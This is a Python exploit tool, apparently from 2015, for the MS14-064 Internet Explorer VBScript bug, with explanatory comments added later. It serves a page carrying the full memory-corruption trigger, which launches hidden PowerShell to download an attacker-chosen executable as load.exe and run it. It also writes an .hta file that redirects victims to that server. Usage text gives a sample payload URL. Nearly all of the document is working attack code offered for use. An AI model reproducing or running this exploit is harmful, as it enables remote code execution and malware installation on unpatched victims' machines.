#-------------------------------------------------------------------------------
# Name: Microsoft Windows HTA (HTML Application) - Remote Code Execution
# Purpose:
#
# Author: kai (kaisai12 - ceh.vn)
#
# Created: 21/08/2015
# Copyright: (c) kai 2015
#
#-------------------------------------------------------------------------------
import sys,os
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
import re
import socket,SocketServer
# Directory containing this script.  It is only used in the status message
# printed by createfileexploit(); the generated file itself is opened by the
# name given on the command line, i.e. relative to the current working
# directory, not to HOME.
HOME = os.path.dirname(os.path.realpath(__file__))
class myHandler(BaseHTTPRequestHandler):
    """HTTP handler that answers every request with the page held in ``evil_html``.

    The request path, query string and body are never inspected: any GET or
    POST receives a 200 ``text/html`` response whose body is the class
    attribute ``evil_html``.  server() assigns that attribute (the output of
    exploit_payload()) before the server starts, so every client sees the
    same page.  Request logging is whatever BaseHTTPRequestHandler does by
    default (one line per request on stderr).
    """
    # Class-level attribute shared by all handler instances; overwritten by
    # server() before the first request is served.
    evil_html = ''
    def do_GET(self):
        """Reply 200 text/html with ``evil_html``, whatever path was requested."""
        self.send_response(200)
        self.send_header("Content-type", "text/html")
        self.end_headers()
        # Python 2 str written as-is; no Content-Length header is sent.
        self.wfile.write(self.evil_html)
        return
    def do_POST(self):
        """Identical to do_GET; the POST body is not read."""
        self.send_response(200)
        self.send_header("Content-type", "text/html")
        self.end_headers()
        self.wfile.write(self.evil_html)
        return
def server(ip,htmlpayload):
    """Serve *htmlpayload* on ``ip``:80 until interrupted with CTRL+C.

    Args:
        ip: address to bind.  The caller passes the same value to
            createfileexploit(), which embeds it in the .hta redirect.
        htmlpayload: the HTML page returned for every request
            (see exploit_payload()).

    Port 80 is hard-coded; binding it normally requires elevated privileges,
    and a failure to bind raises out of this function (the caller's bare
    ``except`` in the ``__main__`` block turns that into a plain 'Error').
    """
    port = 80
    print '[+] Running Server : %s Port %s\n' % (ip,port)
    # Hand the page to the handler class (shared by all requests) before
    # the server is created.
    myHandler.evil_html = htmlpayload
    httpd = SocketServer.TCPServer((ip, port), myHandler)
    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        print "CTRL+C Interupt Detected!"
        print "Shutdown Server"
        # NOTE: this is an attribute reference, not a call, so it does
        # nothing; the process simply exits on the next line.
        httpd.shutdown
        exit()
def exploit_payload(linkpayload):
    """Build the HTML/VBScript page that server() returns to the browser.

    Args:
        linkpayload: URL that the embedded VBScript ``trigger()`` function
            hands to powershell.exe, which downloads it as ``load.exe`` and
            runs it.  It is interpolated into the page unescaped.

    Returns:
        The whole page as one Python 2 str.

    The page carries two ``<SCRIPT LANGUAGE="VBScript">`` blocks.  The first
    defines ``trigger()``, which launches powershell.exe through
    Shell.Application.  The second (the triple-quoted literal below, kept
    verbatim as string data) is the memory-corruption trigger for the
    MS14-064 bug named in banner(): ``Begin()`` runs only when the
    User-Agent contains "MSIE" and not "Win64", and ``setnotsafemode()``
    ends by calling ``trigger()``.  The ``X-UA-Compatible`` meta tag asks IE
    for IE8 emulation.  Nothing in the VBScript is executed on the Python
    side.

    Defensive notes: the MS14-064 update closes the bug this page depends
    on, and the page only runs in IE (VBScript engine).  Every response from
    server() has this same ``text/html`` body, so the host's web/proxy logs
    show a page containing a VBScript block and a powershell.exe launch.
    """
    html = '<html>\n'
    html += '<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >\n'
    html += '<title>Crazy :v Fun </title>\n'
    html += '<body bgcolor = Black link="#00FF00" alink="#ADFF2F" vlink="#98FB98"><br/>\n\n\n'
    # First script block: the launcher called at the end of setnotsafemode().
    html += '<SCRIPT LANGUAGE="VBScript">\n\n'
    html += 'function trigger()\n'
    html += 'On Error Resume Next\n'
    html += 'set shell=createobject("Shell.Application")\n'
    # Adjacent string literals are concatenated by Python; linkpayload is the
    # only value substituted into the page.
    html += 'command="Invoke-Expression $(New-Object System.Net.WebClient).DownloadFile('"'%s','"'load.exe'"');$(New-Object -com Shell.Application).ShellExecute('load.exe');"'"' % linkpayload
    html += '\nshell.ShellExecute "powershell.exe", "-Command " & command, "", "runas", 0 \n'
    html += 'end function\n'
    html += '</script>\n'
    # Second script block: the MS14-064 trigger, opaque string data from the
    # Python side.  Note that runshellcode(), called when intVersion<4, is
    # not defined anywhere on this page; with "On Error Resume Next" that
    # branch silently does nothing.
    html += """
<SCRIPT LANGUAGE="VBScript">
dim aa()
dim ab()
dim a0
dim a1
dim a2
dim a3
dim win9x
dim intVersion
dim rnda
dim funclass
dim myarray
Begin()
function Begin()
On Error Resume Next
info=Navigator.UserAgent
if(instr(info,"Win64")>0) then
exit function
end if
if (instr(info,"MSIE")>0) then
intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
else
exit function
end if
win9x=0
BeginInit()
If Create()=True Then
myarray=chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
if(intVersion<4) then
document.write("<br> IE")
document.write(intVersion)
runshellcode()
else
setnotsafemode()
end if
end if
end function
function BeginInit()
Randomize()
redim aa(5)
redim ab(5)
a0=13+17*rnd(6)
a3=7+3*rnd(5)
end function
function Create()
On Error Resume Next
dim i
Create=False
For i = 0 To 400
If Over()=True Then
' document.write(i)
Create=True
Exit For
End If
Next
end function
sub testaa()
end sub
function mydata()
On Error Resume Next
i=testaa
i=null
redim Preserve aa(a2)
ab(0)=0
aa(a1)=i
ab(0)=6.36598737437801E-314
aa(a1+2)=myarray
ab(2)=1.74088534731324E-310
mydata=aa(a1)
redim Preserve aa(a0)
end function
function setnotsafemode()
On Error Resume Next
i=mydata()
i=readmemo(i+8)
i=readmemo(i+16)
j=readmemo(i+&h134)
for k=0 to &h60 step 4
j=readmemo(i+&h120+k)
if(j=14) then
j=0
redim Preserve aa(a2)
aa(a1+2)(i+&h11c+k)=ab(4)
redim Preserve aa(a0)
j=0
j=readmemo(i+&h120+k)
Exit for
end if
next
ab(2)=1.69759663316747E-313
trigger()
end function
function Over()
On Error Resume Next
dim type1,type2,type3
Over=False
a0=a0+a3
a1=a0+2
a2=a0+&h8000000
redim Preserve aa(a0)
redim ab(a0)
redim Preserve aa(a2)
type1=1
ab(0)=1.123456789012345678901234567890
aa(a0)=10
If(IsObject(aa(a1-1)) = False) Then
if(intVersion<4) then
mem=cint(a0+1)*16
j=vartype(aa(a1-1))
if((j=mem+4) or (j*8=mem+8)) then
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
else
redim Preserve aa(a0)
exit function
end if
else
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
end if
end if
If(type1=&h2f66) Then
Over=True
End If
If(type1=&hB9AD) Then
Over=True
win9x=1
End If
redim Preserve aa(a0)
end function
function ReadMemo(add)
On Error Resume Next
redim Preserve aa(a2)
ab(0)=0
aa(a1)=add+4
ab(0)=1.69759663316747E-313
ReadMemo=lenb(aa(a1))
ab(0)=0
redim Preserve aa(a0)
end function
</script>
<center><h1><object width="420" height="315"
data="http://www.youtube.com/embed/YAKX0ZzUtA8?autoplay=1">
</object></h1></center>
<hr></body></html>"""
    return html
def createfileexploit(ip,fileexploit):
    """Write the .hta landing file that redirects the browser to ``http://ip``.

    Args:
        ip: address of the server started by server(); embedded unescaped in
            a 0-second meta refresh.
        fileexploit: output file name, opened as given (relative names
            resolve against the current working directory, not HOME).

    Any failure is swallowed by the bare ``except`` and only reported as a
    printed message, so the caller cannot tell that nothing was written.
    The file handle is also not closed if ``write`` raises.
    """
    # NOTE: ``%`` binds tighter than ``+``, so the message is
    # ('...%s\\\n' % HOME) + fileexploit -- the file name lands on the line
    # after HOME instead of being joined to it.
    print '[+] Genarate Exploit Build Name: %s\\\n' % HOME + fileexploit
    try:
        f = open(fileexploit,'wb')
        f.write('<html><head><title>Crazy!</title><META http-equiv="refresh" content="0;URL=http://'+ip+'"></head></html>')
        f.close()
        print '[+] Create file payload ok \n'
    except:
        print "[-] Error write playload \n"
def banner():
    """Print the tool's title banner, framed by two 50-character rules."""
    rule = '-' * 50
    lines = [
        rule,
        ' Title : Microsoft Windows HTA (HTML Application) - Remote Code Execution',
        ' Tested on Windows 7 / Server 2008 (support powershell :v) \n\n',
        ' Author : Kai (CEH.VN) \n\n',
        ' Website : http://www.ceh.vn',
        ' Twitter : https://twitter.com/kaisai121',
        ' FaceBook : https://www.facebook.com/kai.sai.35\n\n',
        ' Bug Vendor : MS14-064',
        rule,
    ]
    # One print statement per line keeps the output identical to printing
    # each literal directly.
    for line in lines:
        print line
def usage():
    """Print the command-line synopsis followed by an example invocation."""
    synopsis = "\n[+] Usage: htaexploit.py <Link download file execute> <Ip server payload> <Name file payload create (.hta)> \n"
    example = "\n \t(htaexploit.py http://kaisai.com/exploit.exe 127.0.0.1 zeref.hta)\n"
    for text in (synopsis, example):
        print text
if __name__ == '__main__':
    banner()
    # NOTE: three positional arguments are used below (argv[1], argv[2],
    # argv[3]) but the check only rejects fewer than two; with exactly two
    # the IndexError is caught by the bare except and reported as 'Error'.
    if len(sys.argv) < 3:
        usage()
    else:
        try:
            # argv[1] = download URL, argv[2] = bind address / redirect
            # target, argv[3] = name of the .hta file to write.
            createfileexploit(sys.argv[2],sys.argv[3])
            server(sys.argv[2],exploit_payload(sys.argv[1]))
        except:
            # Every failure (bad argv, bind errors, ...) is reduced to one word.
            print 'Error'